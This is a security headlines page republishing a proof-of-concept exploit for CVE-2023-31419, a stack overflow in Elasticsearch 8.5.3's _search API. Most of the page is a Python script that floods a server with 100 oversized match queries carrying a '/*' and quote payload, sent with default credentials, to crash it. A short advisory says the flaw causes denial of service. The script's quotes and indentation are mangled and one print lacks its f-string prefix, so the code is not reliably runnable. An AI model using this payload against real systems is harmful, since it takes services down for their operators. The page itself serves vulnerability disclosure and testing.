Security
Headlines
HeadlinesLatestCVEs

Headline

Elasticsearch 8.5.3 Stack Overflow

Elasticsearch version 8.5.3 stack overflow proof of concept exploit.

Packet Storm
#ubuntu#js#git#auth#ssl

Exploit Author: TOUHAMI KASBAOUI

Vendor Homepage: https://elastic.co/

Version: 8.5.3 / OpenSearch

Tested on: Ubuntu 20.04 LTS

CVE : CVE-2023-31419

Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419

import requests
import random
import string

es_url = ‘http://localhost:9200’ # Replace with your Elasticsearch server URL
index_name = ‘*’

payload = “/*” * 10000 + “\” +"’" * 999

verify_ssl = False

username = ‘elastic’
password = ‘changeme’

auth = (username, password)

num_queries = 100

for _ in range(num_queries):
symbols = '’.join(random.choice(string.ascii_letters + string.digits + ‘^’) for _ in range(5000))
search_query = {
"query": {
"match": {
"message": (symbols * 9000) + payload
}
}
}

print(f"Query {_ + 1} - Search Query:")

search_endpoint = f'{es_url}/{index_name}/_search'  
response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)

if response.status_code == 200:  
    search_results = response.json()

    print(f"Query {_ + 1} - Response:")  
    print(search_results)

    total_hits = search_results['hits']['total']['value']  
    print(f"Query {_ + 1}: Total hits: {total_hits}")

    for hit in search_results['hits']['hits']:  
        source_data = hit['_source']  
        print("Payload result: {search_results}")  
else:  
    print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

Related news

GHSA-qwrx-45xf-jjf7: Elasticsearch vulnerable to stack overflow in the search API

A flaw was discovered in Elasticsearch affecting the `_search` API that allowed a specially crafted query string to cause a stack overflow and ultimately a denial of service.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6